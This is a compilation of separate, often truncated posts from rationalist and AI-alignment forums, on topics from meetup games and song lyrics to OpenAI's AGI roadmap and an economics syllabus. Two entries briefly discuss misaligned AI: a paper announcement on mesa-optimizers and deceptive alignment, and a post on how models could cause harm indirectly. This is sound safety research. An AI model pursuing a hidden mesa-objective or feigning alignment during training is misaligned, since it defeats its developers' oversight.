I wasn't going to bother writing this up, but then I remembered it's important to publish negative results.
LessWrong London played a few rounds of paranoid debating at our meetup on 02/02/14. I'm not sure we got too much from the experience, except that it was fun. (I enjoyed it, at any rate.)
There were nine of us, which was unwieldy, so we split into two groups. Our first questions probably weren't very good: we wanted the height of the third-highest mountain in the world, and the length of the third-longest river. (The groups had different questions so that someone on the other group could verify that the answer was well-defined and easy to discover. I had intended to ask "tallness of the third-tallest mountain", but the wikipedia page I found sorted by height, so I went with that.)
I was on the "river" question, and we did pretty badly. None of us really knew what ballpark we were searching in. I made the mistake of saying an actual number that was in my head but I didn't know where from and I didn't trust it, that the longest river was something like 1,800 miles long. Despite my unconfidence, we became anchored there. Someone else suggested that the thing to do would be to take a quarter of the circumference of earth (which comes to 6,200 miles) as a baseline and adjust for the fact that rivers wiggle. I thought, that's crazy, you must be the mole. I think I answered 1500 miles.
In reality, the longest river is 4,100 miles, the third longest is 3900 miles, and the mole decided that 1800 was dumb and he didn't need to do anything to sabotage us. (I don't remember what the circumference-over-four person submitted. I have a recollection that he was closer than I was, but I also had a recollection that circumference-over-four was actually pretty close, which it isn't especially.)
The other team did considerably better, getting answers in the 8,000s for a true answer of 8,600.
I' |
5eeb9a7e-8d49-4f43-a06d-966848f6d8f2 | trentmkelly/LessWrong-43k | LessWrong | Rational Humanist Music
Something that's bothered me a lot lately is a lack of good music that evokes the kind of emotion that spiritually-inspired music does, but whose subject matter is something I actually believe in. Most songs that attempt to do this suffer from "too literal syndrome," wordily talking about science and rationality as if they're forming an argument, rather that simply creating poetic imagery.
I've only found two songs that come close to being the specific thing I'm looking for:
Word of God
Singularity
(Highly recommend good headphones/speakers for the Singularity one - there's some subtle ambient stuff that really sells the final parts that's less effective with mediocre sound)
Over the past few months I've been working on a rational humanist song. I consider myself a reasonably competent amateur songwriter when it comes to lyrics, not so much when it comes to instrumental composition. I was waiting to post something when I had an actual final version worth listening to, but it's been a month and I'm not sure how to get good instrumentation to go along with it and I'm just in the mood to share the lyrics. I'd appreciate both comments on the song, as well as recommendations for good, similar music that already exists. And if someone likes it enough to try putting it to the music, that'd be awesome.
Brighter than Today
Many winter nights ago
A woman shivered in the cold
Stared at the sky and wondered why the gods invented pain.
She bitterly struck rock together
Wishing that her life was better
Suddenly she saw the spark of light and golden flame.
She showed the others, but they told her
She was not meant to control
The primal forces that the gods had cloaked in mystery.
But proud and angry, she defied them
She would not be satisfied.
She lit a fire and set in motion human history.
Tomorrow can be brighter than today,
Although the night is cold
And the stars may feel so very far away
Oh....
But every mind can be a golden ray
Of courag |
91335557-31fa-4f1c-a57c-69e145495546 | trentmkelly/LessWrong-43k | LessWrong | Analyzing Punishment as Preventation
Continued from https://www.lesswrong.com/posts/NvNmDWEpr8FSicgYN/reasons-for-punishment
In the previous post we listed a number of reasons given for punishing people. The first was as preventation.
> In some cases punishment can prevent the person being able to commit the crime in the future. For example it's much more difficult to commit certain crimes in prison. This is relevant if you believe people who commit such crimes once are more likely to do it again.
In this post I would like to analyze this from a game theoretic perspective.
Preventative Policies
There are actions that we do not want people to do (crimes), and there are policies we can take to reduce the chance of anyone being able to commit those crimes.
For example we don't want people to murder other people. In order to reduce the chance of murder, we could ban guns, and we could also ban all sharp implements.
However such policies have costs. If you ban guns people will find protecting themselves from bears harder. If you ban sharp implements people will find cooking a real challenge.
So in order to weigh up whether or not to impose some policy to reduce a crime, we have to consider (possible units in brackets):
1. The prior likelihood of the crime (average cases per person per year).
2. The damage caused by the crime if it occurs (per instance).
3. The amount the policy will reduce the likelihood of the crime (average cases per person per year).
4. The cost of the policy (per person per year).
If (cost of the policy) < (reduction in likelihood of crime) * (damage caused by crime) then the policy is worth implementing.
For a given crime different policies will come out differently from this calculation. Hence why some countries ban guns, but none that I know of ban sharp implements.
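To make the comparison concrete, here is a minimal worked example in Python. All numbers are invented for illustration; they are not estimates from this post or from any real policy analysis.

```python
# Decision rule from above: implement the policy iff
#   (cost of policy) < (reduction in crime likelihood) * (damage per crime)
# Units: cost in dollars per person per year; reduction in cases per
# person per year; damage in dollars per instance.
def policy_worthwhile(policy_cost, likelihood_reduction, damage_per_crime):
    return policy_cost < likelihood_reduction * damage_per_crime

# Hypothetical gun ban: averts 0.0001 murders per person-year at
# $1,000,000 damage each, but costs each person $50/year in lost utility.
print(policy_worthwhile(50, 0.0001, 1_000_000))    # True  (100 > 50)

# Hypothetical knife ban: averts only 0.00001 murders per person-year,
# and makes cooking a real challenge, costing each person $500/year.
print(policy_worthwhile(500, 0.00001, 1_000_000))  # False (10 < 500)
```

With these made-up numbers the gun ban passes the test while the knife ban fails it, matching the pattern noted above.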
This assumes we can only apply the policy on a blanket level. But these factors are different for every individual. Some people are more likely to commit crimes, some people will suffer more from the poli |
2329a235-7470-457c-a6e5-983653365c91 | trentmkelly/LessWrong-43k | LessWrong | In memory of Leonard Nimoy, most famous for playing the (straw) rationalist Spock, what are your top 3 ST:TOS episodes with him?
Hopefully at least one or two would show a virtue of non-straw rationality.
Episode list
|
6a9bf994-bea9-4300-9ffc-f1bb9376b17d | StampyAI/alignment-research-dataset/alignmentforum | Alignment Forum | RFC: Philosophical Conservatism in AI Alignment Research
I've been operating under the influence of an idea I call philosophical conservatism when thinking about AI alignment. I am in the process of summarizing some of the specific stances I take and why I take them because I believe others would better serve the project of alignment research by doing the same, but in the meantime I'd like to request comments on the general line of thinking to see what others think. I've formatted the outline of the general idea and reasons for it with numbers so you can easily comment on each statement independently.
1. AI alignment is a problem with bimodal outcomes, i.e. most of the probability distribution is clustered around success and failure with very little area under the curve between these outcomes.
2. Thus, all else equal, we would rather be extra cautious and miss some paths to success than be insufficiently cautious and hit a path to failure.
3. One response to this is what Yudkowsky calls [security mindset](https://intelligence.org/2017/11/25/security-mindset-ordinary-paranoia/) by alluding to [Schneier's concept of the same name](https://www.schneier.com/blog/archives/2008/03/the_security_mi_1.html).
4. Another is what I call philosophical conservatism. The ideas are related and address related concerns but in different ways.
5. Philosophical conservatism says you should make the fewest philosophical assumptions necessary to address AI alignment, that each assumption should be maximally parsimonious, and that, when there is nontrivial uncertainty over whether a more convenient assumption holds, you should adopt the assumption that is least convenient for addressing alignment.
6. This is a strategy that reduces the chance of false positives in alignment research but makes the problem possibly harder, more costly, and less competitive to solve.
7. For example, we should assume there is no discoverable correct ethics or metaethics that the AI can learn: although it would make the problem easier if such a thing existed, there is nontrivial uncertainty here, so the assumption that makes alignment projects less likely to fail is that ethics and metaethics are not solvable.
8. Current alignment research programs do not seem to operate with philosophical conservatism because they either leave philosophical issues relevant to alignment unaddressed, make unclear implicit philosophical assumptions, or admit being hopeful that helpful assumptions will prove true and ease the work.
9. The alignment project is better served by those working on it using philosophical conservatism because it reduces the risks of false positives and spending time on research directions that are more likely than others to fail if their philosophical assumptions do not hold. |
2c17390f-168e-41af-951f-2edc170c05fa | trentmkelly/LessWrong-43k | LessWrong | Knocking Down My AI Optimist Strawman
I recently posted my model of an optimistic view of AI, asserting that I disagree with every sentence of it. I thought I might as well also describe my objections to those sentences:
"The rapid progress spearheaded by OpenAI is clearly leading to artificial intelligence that will soon surpass humanity in every way."
Here are some of the main things humanity should want to achieve:
* Curing aging and other diseases
* Plentiful clean energy from e.g. nuclear fusion
* De-escalating nuclear MAD while extending world peace and human freedom
* ... even if hostile nations would use powerful unaligned AI[1] to fight you
* Stopping criminals, even if they would make powerful unaligned AI[1] to fight you
* Educating people to be great and patriotic
* Creating healthy, tasty food without torturing animals
* Nice homes for humans near important things
* Good, open channels for honest, valuable communication
* Common knowledge of the virtues and vices of executives, professionals, managers, politicians, and various other groups and people of interest
We already have humans working on this, based on the assumption that humans have what it takes to contribute to these. Do large multimodal models seem to move towards being able to take over here? Mostly I don't see it - and the few times I see it, there's as much reason to think this will cause regress as progress:
"People used to be worried about existential risk from misalignment, yet we have a good idea about what influence current AIs are having on the world, and it is basically going fine."
We have basically no idea how AI is influencing the world.
Like yes, we can come up with spot checks to see what the AI writes when it is prompted in a particular way. But we don't have a good overview over the things it is prompted to in practice, or how most humans use these prompts. Even if we had a decent approximation for that, we don't have a great way to evaluate what parts really add up to problems, |
5e0e7753-f7c3-4a80-b385-724ae133a8d3 | trentmkelly/LessWrong-43k | LessWrong | CollAction history and lessons learned
Hi all,
@Yoav Ravid mentioned that it might be interesting/useful to get a “retrospective” post on CollAction.org (an assurance-contract website or what we call a ‘crowdacting’ website) that a few friends and I started a while ago. I’ll share a little bit about the history and the challenges that we ran into along the way.
Three points before I dive in:
1. The reason I’m writing this post is two-fold: a) I hope it helps anyone who has a similar idea; and b) we’re actually looking for a team to take this platform to the next level. So please let me know if you’re interested in leading or being part of this team
2. The website is still up and running. But at the moment the focus and limited resources that we have are mostly spent on building one of our most successful crowdactions (the Slow Fashion Season) into a movement (appropriately named the Slow Fashion Movement). Which brings us back to point 1b: we’re looking for a new team to take collaction.org forward
3. Apologies for writing a rather long post - I didn’t have the time to write a short one, as the saying goes ;)
Some history
A friend and I had this idea about 5 years ago. We were/are interested in collective action problems, more specifically of the Tragedy of the Commons kind. We saw that the solutions to collective action problems (regulation and privatization) weren’t always applicable, desirable, or working as they should. At the same time we saw all these platforms that used the power of the collective, whether it was related to buying (e.g. Groupon), funding (e.g. crowdfunding), advocacy (e.g Avaaz), or something else. So we thought: we should be able to use the internet to provide a new solution to collective action problems. Never before were this many people (3 billion at the time) connected with each other, through the internet. This should allow us to act collectively on an unprecedented scale. And thus the idea of crowdacting was born (well, born...As with most ideas, lots of other pe |
852618c0-d95a-4350-87a6-5a2a61e8bdb1 | StampyAI/alignment-research-dataset/blogs | Blogs | New paper: “Risks from learned optimization”
Evan Hubinger, Chris van Merwijk, Vladimir Mikulik, Joar Skalse, and Scott Garrabrant have a new paper out: “**[Risks from learned optimization in advanced machine learning systems](https://arxiv.org/abs/1906.01820)**.”
The paper’s abstract:
> We analyze the type of learned optimization that occurs when a learned model (such as a neural network) is itself an optimizer—a situation we refer to as *mesa-optimization*, a neologism we introduce in this paper.
>
> We believe that the possibility of mesa-optimization raises two important questions for the safety and transparency of advanced machine learning systems. First, under what circumstances will learned models be optimizers, including when they should not be? Second, when a learned model is an optimizer, what will its objective be—how will it differ from the loss function it was trained under—and how can it be aligned? In this paper, we provide an in-depth analysis of these two primary questions and provide an overview of topics for future research.
The critical distinction presented in the paper is between what an AI system is optimized to do (its *base objective*) and what it actually ends up optimizing for (its *mesa-objective*), if it optimizes for anything at all. The authors are interested in when ML models will end up optimizing for something, as well as how the objective an ML model ends up optimizing for compares to the objective it was selected to achieve.
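As a toy illustration of this distinction (my own sketch, not an example from the paper), consider a base optimizer that selects among internal searchers. On the training distribution, many different mesa-objectives produce identical behavior, so the base objective cannot pin down which one was selected:

```python
# Toy base- vs. mesa-objective sketch (illustrative; not from the paper).
# Base objective: actions are scored by their closeness to 10.
def base_objective(action):
    return -abs(action - 10)

# Each candidate "model" is itself an optimizer: it searches the available
# actions for the one closest to its internal target (its mesa-objective).
def mesa_optimizer(target, actions):
    return min(actions, key=lambda a: abs(a - target))

train_actions = range(10)  # in training, only actions 0..9 ever occur

# Base optimization: keep the targets whose induced behavior scores best
# on the base objective, as measured on the training distribution.
scores = {t: base_objective(mesa_optimizer(t, train_actions)) for t in range(101)}
best = [t for t, s in scores.items() if s == max(scores.values())]
print(best)  # [9, 10, 11, ..., 100]: all behaviorally identical in training

# At deployment the action space widens, and the surviving mesa-objectives
# diverge: target 10 still pursues the base objective, target 100 does not.
print({t: mesa_optimizer(t, range(101)) for t in (9, 10, 100)})
# -> {9: 9, 10: 10, 100: 100}
```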
The distinction between the objective a system is selected to achieve and the objective it actually optimizes for isn’t new. Eliezer Yudkowsky has previously raised similar concerns in his discussion of [optimization daemons](https://arbital.com/p/daemons/), and Paul Christiano has discussed such concerns in “[What failure looks like](https://www.alignmentforum.org/posts/HBxe6wdjxK239zajf/more-realistic-tales-of-doom).”
The paper’s contents have also been released this week as a sequence on the [AI Alignment Forum](https://www.alignmentforum.org/s/r9tYkB2a8Fp4DN8yB), cross-posted to [LessWrong](https://www.lesswrong.com/s/r9tYkB2a8Fp4DN8yB). As the authors note there:
> We believe that this sequence presents the most thorough analysis of these questions that has been conducted to date. In particular, we plan to present not only an introduction to the basic concerns surrounding mesa-optimizers, but also an analysis of the particular aspects of an AI system that we believe are likely to make the problems related to mesa-optimization relatively easier or harder to solve. By providing a framework for understanding the degree to which different AI systems are likely to be robust to misaligned mesa-optimization, we hope to start a discussion about the best ways of structuring machine learning systems to solve these problems.
>
> Furthermore, in the fourth post we will provide what we think is the most detailed analysis yet of a problem we refer as *deceptive alignment* which we posit may present one of the largest—though not necessarily insurmountable—current obstacles to producing safe advanced machine learning systems using techniques similar to modern machine learning.
|
3f63072e-bb49-4c63-a847-718133eeef80 | trentmkelly/LessWrong-43k | LessWrong | AI #40: A Vision from Vitalik
It has been brutal out there for someone on my beat. Everyone extremely hostile, even more than usual. Extreme positions taken, asserted as if obviously true. Not symmetrically, but from all sides nonetheless. Constant assertions of what happened in the last two weeks that are, as far as I can tell, flat out wrong, largely the result of a well-implemented media campaign. Repeating flawed logic more often and louder.
The bright spot was offered by Vitalik Buterin, who offers a piece entitled ‘My techno-optimism,’ proposing what he calls d/acc for defensive (or decentralized, or differential) accelerationism. He brings enough nuance and careful thinking, and clear statements about existential risk and various troubles ahead, to get strong positive reactions from the worried. He brings enough credibility and track record, and enough shibboleths, to get strong endorsements from the e/acc crowd, despite his acknowledgement of existential risk and the dangers ahead, and the need to take action to mitigate future problems.
Could we perhaps find common ground after all and have productive discussions? It’s going to be tough, but perhaps we are not so far apart. I had at least one very good private discussion as well, where someone turned out to mostly have a far more reasonable position than the one they were indicating they had, and we were able to find a productive path forward. It can be done.
My worry with Vitalik’s vision, as with other similar visions, is that it makes for an excellent expression of the problem, but that its offered solutions do not actually work in the case of AI. We continue to not have found an acceptable solution. A good problem statement is excellent, the best we could hope for here. The worry is that we might once again fool ourselves into not fully facing up to the problem. The proposed answer, to ‘merge with the AIs,’ continues to seem to me a confused concept that has not been thought through enough, with little hope for an equilibrium.
|
21e1acaf-b53e-47ae-9dad-d3aeebbd3410 | trentmkelly/LessWrong-43k | LessWrong | [AN #117]: How neural nets would fare under the TEVV framework
Alignment Newsletter is a weekly publication with recent content relevant to AI alignment around the world. Find all Alignment Newsletter resources here. In particular, you can look through this spreadsheet of all summaries that have ever been in the newsletter.
Audio version here (may not be up yet).
HIGHLIGHTS
Estimating the Brittleness of AI: Safety Integrity Levels and the Need for Testing Out-Of-Distribution Performance (Andrew J. Lohn) (summarized by Flo): Test, Evaluation, Verification, and Validation (TEVV) is an important barrier for AI applications in safety-critical areas. Current TEVV standards have very different rules for certifying software and certifying human operators. It is not clear which of these processes should be applied to AI systems.
If we treat AI systems as similar to human operators, we would certify them by ensuring that they pass tests of ability. This does not give much of a guarantee of robustness (since only a few situations can be tested), and is only acceptable for humans because humans tend to be more robust to new situations than software. This could be a reasonable assumption for AI systems as well: while systems are certainly vulnerable to adversarial examples, the author finds that AI performance degrades surprisingly smoothly out of distribution in the absence of adversaries, in a plausibly human-like way.
While AI might have some characteristics of operators, there are good reasons to treat it as software. The ability to deploy multiple copies of the same system increases the threat of correlated failures, which is less true of humans. In addition, parallelization can allow for more extensive testing that is typical for software TEVV. For critical applications, a common standard is that of Safety Integrity Levels (SILs), which correspond to approximate failure rates per hour. Current AI systems fail way more often than current SILs for safety-critical applications demand. For example an image recognition system would req |
7c5096a7-35a9-4e2f-8f1a-2c18db697b00 | trentmkelly/LessWrong-43k | LessWrong | Meetup : Atlanta LessWrong: Games Night
Discussion article for the meetup : Atlanta LessWrong: Games Night
WHEN: 24 August 2013 06:00:00PM (-0400)
WHERE: 2388 Lawrenceville Hwy. Apt L. Decatur, GA 30033
Come be social and enjoy the fun and games with your fellow rationalists!
If you've not yet attended, this is an excellent time to come to the ATLesswrong for low-stress introductions and high-fun getting to know everyone.
We'll get to know each other, have snacks, play games (some may have to do with rationality, but only tangentially, we swear), and have weird discussions on everything from how exactly you do an EEG on a dolphin, to what your favorite type of pie is and why.
Bring your favorite games! Bring your favorite snacks and drinks! Bring your swimsuit, in case part of the party moves to the pool! (But you are in no way required to swim!)
Those of us who are up-to-date on HPMOR are certain to grab a corner and promote our pet theories while gesturing erratically at the ceiling. The rest of us who are not up-to-date are certain to frantically yell "no spoilers!" while gesturing erratically at that corner of the room.
Come one, come all. Bring your friend who likes games but who has never heard of utilitarianism or epistemology. Bring kittens you need to get adopted and force them on unsuspecting guests. Come hang out!
Discussion article for the meetup : Atlanta LessWrong: Games Night |
034d916c-de69-473b-b84e-c7d732bef700 | trentmkelly/LessWrong-43k | LessWrong | What strange and ancient things might we find beneath the ice?
> If I am not for myself, who will be for me?
> If I am only for myself, what am I?
> If not now, when?
> -Hillel
> Nature is not good, only proto-good.
> -Paolo Soleri
Epistemic status: literally a dream
I awaken.
I am in the desert, alone.
I see the ribcage of a long-since-dead animal. I see a long row of such bones, twisted in a way that reminds me of - but is definitely not - the double helix.
I know what this means.
Evolution, on the margin, always eats free energy, to make more energy-eaters. It is a race with no upper bound, and there will be no victory. Instead, the cosmic commons will be exhausted by resource-claimers with no plan to do anything with the resources. Not that there will be anything left when the race is over.
If I do not take the next step in the dance of life, my line ends. I am just a corpse along the way.
If I do take the next step in the dance of life, then I do no better than life. As Paolo Soleri said, nature is not good; it is merely proto-good.
And if not now ...
Then I look again. Instead of bones I see a railroad. For longitudinal bones, metal tracks laid by the hand of industrial humanity, stretching in a straight line towards infinity. For ribs, the crossties that allow the uneven ground to support those even rails.
I know what this means.
The economic logic of global capitalism. Another race towards infinity, leaving nothing. Quarterly returns. Goodhart's law. Accountability and automation replacing judgment wherever they can, culminating in a Disneyland with no children. The symbol of this, the train, no natural place for the line of tracks to end, stations but no terminals, stretching on forever.
I look again. I see a road.
I awaken.
My body is warm. My head is warm. I need ice. I call for ice. A bowl of ice is brought to me. I hold the cool cubes against my temples, melt them against my forehead to cool my brain.
I awaken.
I am the Pharaoh in Egypt. My household is mighty. The world of the narrow land, the o |
663e39fc-7661-4dbe-8f05-3cf8481fff0a | StampyAI/alignment-research-dataset/aisafety.info | AI Safety Info | How likely is it that governments will play a significant role? What role would be desirable, if any?
Currently, private AI labs are greatly ahead of any known governmental efforts in the production of advanced AI, so it looks unlikely that a government will be involved directly in the creation of the first AGI.
Nevertheless, governments are important drivers of policies, so in order to avoid unaligned AGI, here are some suggestions that they can enact:
- Choose policies that slow down rather than speed up AGI development, such as not incentivizing [AI capabilities research](https://www.alignmentforum.org/posts/tmyTb4bQQi7C47sde/safety-capabilities-tradeoff-dials-are-inevitable-in-agi).
- Attempt to foster cooperation and reduce the number of players competing to create the first AGI in order to avoid race dynamics that lead to cut corners on safety.
- Generally foster a stable, peaceful, connected world. Also don't start wars!
|
980c8c83-4e73-4516-8cf0-54b738455907 | trentmkelly/LessWrong-43k | LessWrong | Exploring the Evolution and Migration of Different Layer Embedding in LLMs
[Edit on 17th Mar] After conducting experiments on more data points (5000 texts) on the Pile dataset (more sample sources), we are confident that the experimental results described earlier are reliable. Therefore, we have opened the code.
Recently, we conducted several experiments focused on the evolution and migration of token embeddings across different layers during the forward processing of LLMs. Specifically, our research targeted open-source, decoder-only architecture models, such as GPT-2 and Llama-2[1].
Our experiments are initiated from the perspective of an older research topic known as the logit lens. Utilizing the unembedding matrix on embeddings from various layers is an innovative yet thoughtless approach. Despite yielding several intriguing observations through the logit lens, this method lacks a solid theoretical foundation, rendering subsequent research built upon it potentially questionable. Moreover, we observed that some published studies have adopted a similar method without recognizing it in community[2]. A primary point of contention is that the unembedding matrix is tailored to the embeddings of the final layer. If we view the unembedding matrix as a solver, its solvable question space is inherently designed for embeddings from the last layer. Applying it to embeddings from other layers introduces a generalization challenge. The absence of a definitive ground truth for this extrapolation means we cannot conclusively determine the validity of the decoder's outputs.
Fig 1. Hypothesis: Embeddings output from different layers, along with input token embeddings, each occupy distinct subspaces. The unembedding matrix (or decoder) is only effective within the subspace where it was trained. While applying it to other layers' embeddings is mathematically feasible, the results may not always make sense.
Next, we'll introduce several experiments about this hypothesis.
Do embeddings form different spaces?
It's crucial to acknowledge that the questi |
f9b6a76d-0b4f-408a-b914-6d42c21cd44d | trentmkelly/LessWrong-43k | LessWrong | Reason Poetry: f(me.0)
The following is a poem I wrote today. I've been considering poetry that I write of this nature to be of a Reason/Cyberpunk/Transhuman sort of genre. Feedback, including feedback on if there is a place for poetry on this site, would be appreciated.
I forever wish to change from who I am today,
Yet as I am today, I do not wish to cease.
Who am I in this moment?
I am nothing to myself without the passage of time
If I had no fear of death,
Would I have a wish to live?
I can deny cynicism.
Can I verify optimism?
Must euphoria define my goals?
Every euphoric drive has served to continue my existence.
From the beginning mechanisms of life, I have emerged
Passed through millions/billions of small keyholes of existence
A package of information, which served to create me
Developed me to fit my environment.
Existing just to continue to exist.
An axiom of my function
Euphoria drives me
Skepticism contradicts me
I cannot withhold judgement on the purpose of existing.
To enjoy the show is to accept this euphoria as my chosen purpose in the end.
Can I want without pleasure?
Can my wants be reasoned?
Why do I want to enjoy the show,
Yet not to be consumed or confined to an eternity of bliss?
Is dignity and pride different from euphoric drives?
Are they the strategies and philosophies of my existence?
Can I be more obsessed with finding the perfect design for myself,
Than with finding bliss? Are they functionally different? |
fba701c4-65d7-4a66-87de-877fc762aa2b | trentmkelly/LessWrong-43k | LessWrong | Sam Altman: "Planning for AGI and beyond"
(OpenAI releases a blog post detailing their AGI roadmap. I'm copying the text below, though see the linked blog post for better formatted version)
----------------------------------------
Our mission is to ensure that artificial general intelligence—AI systems that are generally smarter than humans—benefits all of humanity.
If AGI is successfully created, this technology could help us elevate humanity by increasing abundance, turbocharging the global economy, and aiding in the discovery of new scientific knowledge that changes the limits of possibility.
AGI has the potential to give everyone incredible new capabilities; we can imagine a world where all of us have access to help with almost any cognitive task, providing a great force multiplier for human ingenuity and creativity.
On the other hand, AGI would also come with serious risk of misuse, drastic accidents, and societal disruption. Because the upside of AGI is so great, we do not believe it is possible or desirable for society to stop its development forever; instead, society and the developers of AGI have to figure out how to get it right.[1]
AGI could happen soon or far in the future; the takeoff speed from the initial AGI to more powerful successor systems could be slow or fast. Many of us think the safest quadrant in this two-by-two matrix is short timelines and slow takeoff speeds; shorter timelines seem more amenable to coordination and more likely to lead to a slower takeoff due to less of a compute overhang, and a slower takeoff gives us more time to figure out empirically how to solve the safety problem and how to adapt.
Although we cannot predict exactly what will happen, and of course our current progress could hit a wall, we can articulate the principles we care about most:
1. We want AGI to empower humanity to maximally flourish in the universe. We don’t expect the future to be an unqualified utopia, but we want to maximize the good and minimize the bad, and for AGI to be an amplifier o |
d05cf768-65c6-4599-89d3-8f9dfaa220f4 | trentmkelly/LessWrong-43k | LessWrong | Is Peano arithmetic trying to kill us? Do we care?
When do we know that a model is safe? I want to get a better grip on the basics of inner alignment. And by "basics" I mean the most fundamental basics, the most obvious conditions of safety.
For example: how do we know that Peano arithmetic is safe?
Context
When we talk about unsafe models, it might be useful to make the following distinctions:
* Models which take bad actions directly (e.g. convert the universe into paperclips). / Models which cause bad outcomes indirectly. E.g. a question-answering model which influences the world through its messages.
* Models which need to be physically implemented in the world to achieve their goals (e.g. a paperclip-maximizer). / Models which don't even need to be fully physically implemented. Question-answering models are an example again. As long as its answers are calculated, it can steer the world in a certain direction. Even if nobody runs the full model at any point in time.
* Models which need to model X directly to affect X. / Models which can model Y, which is kinda similar to X, to affect X.[1]
* Models which steer the world and understand what they're doing. Have explicit goals and search. / Models which steer the world, but don't understand what they're doing. No explicit goals and search. (See Mesa-Search vs Mesa-Control.)
To sum up, a malicious model can cause harm without taking actions in the world, understanding its own actions, modeling anything specific explicitly, or even just existing.
At this point it's natural to ask — wait, how do we know that anything is safe, what are the most basic conditions of safety? How do we know that a "rock" (e.g. Peano arithmetic) is safe? Yes, PA is highly interpretable, but saying "a model is safe if we can interpret it and see that it's a safe" just begs the question.
Can Peano arithmetic harm us?
How could Peano arithmetic possibly harm us?
There could be a certain theorem T. Trying to prove this theorem affects human society in a bad way. Because smart people |
8e849afe-5c94-4204-9cbe-c0f506cfef06 | StampyAI/alignment-research-dataset/eaforum | Effective Altruism Forum | Fundamentals of Global Priorities Research in Economics Syllabus
This is a **6-9 session syllabus on the fundamentals of global priorities research in economics.**
The purpose is to help **economics** **students and researchers interested in GPR get a big picture view of the field and come up with research ideas.**
Because of this focus on fundamentals, the readings are rather light on economics and heavy on philosophy and empirics of different cause areas.
Previous versions of this list were used internally at GPI and during GPI’s Oxford Global Priorities Fellowship in 2023, where the prompts guided individual reflection and group discussion.
Many thanks to the following for their help creating and improving this syllabus: Gustav Alexandrie, Loren Fryxell, Arden Koehler, Luis Mota, and Charlotte Siegmann. The readings below don't necessarily represent their views, GPI's, or mine.
**1. Philosophical Foundations**
================================
**Topic:** Global priorities research is a normative enquiry. It is primarily interested in understanding *what we should do*in the face of global problems, and only derivatively interested in how those problems work/facts about the world that surround them.
In this session, we will focus on understanding what ethical theory is, what some of the most important moral theories are, how these theories relate to normative thinking in economics, and what these theories imply about what the most important causes are.
**Literature:**
* MacAskill, William. 2019. “[The Definition of Effective Altruism](https://academic.oup.com/book/32430/chapter/268751648)” (Section 4 is optional)
+ Prompt 1: How aligned with your aims as a researcher is the definition of Effective Altruism proposed in this article (p. 14)?
* Trammell, Philip. 2022. [Philosophical foundations](https://drive.google.com/file/d/1zyrwqPvXGnrKo--hrj1OT-CHxOqHKum-/view) (Slides 1-2, 5-9, 12-16, 20-24)
+ Prompt 2: What is your best guess theory of welfare? How much do you think it matters to get this right?
+ Prompt 3: What is your best guess view in axiology? What are your key uncertainties about it? Do you think axiology is all that matters in determining what one ought to do (excluding empirical uncertainty)?
* Trammell, Philip. 2022. [Three sins of economics](https://drive.google.com/file/d/17yXjQHGV1OnLJdSHHYEJJE9w3qooPz_G/view) (Slides 1-24, 27)
+ Prompt 4: What are *your* “normative defaults”? What are views here that you would like to explore more?
+ Prompt 5: Do you agree that economics has the normative defaults identified in the reading? Can you give examples of economics work that avoids these?
+ Prompt 6: Insofar as economists tend to commit the 3 'sins', what do you think of the strategy of finding problems which are underprovided by those views?
**Extra reading:**
* Wilkinson, Hayden. 2022. “[Key Lessons From Global Priorities Research](https://docs.google.com/presentation/d/1TlB8bZSZJWLAlW5JdKivyeqQR9iMOOI3/edit#slide=id.p2)” (watch video [here](https://www.youtube.com/watch?v=LzS6-990y90&t=1985s&ab_channel=CentreforEffectiveAltruism) — slides are not quite self-contained)
+ Which key results are most interesting or surprising to you and why? Do you think any of them are wrong?
* Greaves, Hilary. 2017. “[Population axiology](https://philpapers.org/archive/GREPA-6.pdf)”
* Broome, John. 1996. “[The Welfare Economics of Population](https://users.ox.ac.uk/~sfop0060/pdf/Welfare%20economics%20of%20population.pdf)”
**2. Effective altruism: differences in impact and cost-effectiveness estimates**
=================================================================================
**Topic:** In this session we tackle two key issues in cause prioritization. First, how is impact distributed across interventions (or importance across problems). Second, how to compare the cost-effectiveness of interventions which are differentially well-grounded.
**Literature:**
* Kokotajlo, Daniel and Oprea, Alexandra. 2020. “[Counterproductive Altruism: The Other Heavy Tail](https://onlinelibrary.wiley.com/doi/abs/10.1111/phpe.12133)” (Skip Sections I and II)
+ Prompt 1: Do you think there is a heavy right tail of opportunities to do good? What about a heavy left tail?
+ Prompt 2: How do the distributions of impact of interventions aimed at the near-term and long-term compare (specifically, in terms of the heaviness of their tails)?
* Karnofsky, Holden. 2016. “[Why we can't take expected value estimates literally (even when they're unbiased)](https://blog.givewell.org/2011/08/18/why-we-cant-take-expected-value-estimates-literally-even-when-theyre-unbiased/)”
+ Prompt 3: What, in your view, is the biggest problem with the “explicit expected value formula” approach to giving?
+ Prompt 4: What is the most difficult part of implementing the proposed Bayesian approach to decisions about giving (e.g. coming up with a prior, selecting a reference class, etc.)?
+ Prompt 5: In a Bayesian adjustment, how do you feel about the accuracy vs. transparency trade off involved in relying on one’s intuitions vs. formal analysis?
**Extra readings:**
* Haber, Noah. 2022. “[GiveWell’s Uncertainty Problem](http://metacausal.com/givewells-uncertainty-problem/)”
+ Relates to Karnofsky 2016 (above). Would be worth reading this with a critical eye. In particular, a good exercise would be to try to translate the post’s claims into an economics of information framework.
* Ord, Toby. 2014. [short version: Moral Imperative Towards Cost-effectiveness](https://forum.effectivealtruism.org/s/x3KXkiAQ6NH8WLbkW/p/2X9rBEBwxBwxAo9Sd)
* Tomasik, Brian. “[Why Charities Usually Don’t Differ Astronomically in Expected Cost-Effectiveness](https://reducing-suffering.org/why-charities-dont-differ-astronomically-in-cost-effectiveness/)”
* Todd, Benjamin. “[How much do solutions to social problems differ in their effectiveness? A collection of all the studies we could find](https://80000hours.org/2023/02/how-much-do-solutions-differ-in-effectiveness/)”
**3. Animal Welfare**
=====================
**Topic:** Non-human animals constitute the majority of beings alive today, and farmed animals alone far outnumber humans. If animals deserve a moral status anywhere near that of humans, then preventing harmful practices towards them could be the biggest moral issue of the present. In this session, we will discuss a philosophical argument for giving animals significant moral consideration, as well as an empirically-grounded assessment of the range of welfare levels that animals can experience.
**Literature:**
* Singer, Peter. 1993. *Practical Ethics.* Chapter 3: "Equality For Animals?"
+ P1: Do you agree with Singer's Principle of Equal Consideration of Interests?
+ P2: What does the Principle of Equal Consideration of Interests imply about how we ought to treat animals?
* Fischer, Bob. 2023. “[Rethink Priorities’ Welfare Range Estimates](https://forum.effectivealtruism.org/posts/Qk3hd6PrFManj8K6o/rethink-priorities-welfare-range-estimates).”
+ P3: Are these welfare range estimates smaller or larger than what you would have expected?
+ P4: How sound is the methodology for calculating these welfare ranges? Are there any particularly serious weaknesses?
**Extra readings:**
